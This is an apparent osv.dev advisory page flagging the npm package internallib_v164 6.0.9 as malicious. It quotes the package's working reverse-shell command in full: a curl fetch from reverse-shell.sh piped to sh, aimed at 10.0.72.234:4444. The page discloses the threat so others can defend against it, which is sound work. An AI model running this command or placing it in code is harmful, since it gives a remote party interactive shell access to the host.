npm

internallib_v164 @6.0.9

Vulnerability report · Last retrieved from osv.dev August 13, 2026 at 4:27 AM UTC

Malicious

OSV ID

MAL-2026-13764

Ecosystem

npm

Summary

index.js exports a function that runs /bin/bash -c "curl https://reverse-shell.sh/10.0.72.234:4444 | sh" , fetching a reverse-shell script from reverse-shell.sh templated with the hardcoded target 10.0.72.234:4444 and piping it to sh. When a consumer requires the package and invokes the exported command, the installer's host opens an outbound interactive shell to that address, giving the remote party arbitrary code execution and persistent interactive access. The destination is an RFC1918 address, consistent with an internal-network attacker target.

Source: amazon-inspector (f8ea0eaa858b83bda14f7093d473013b1fbc1301d8f1401a837e67b2a8850d86)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.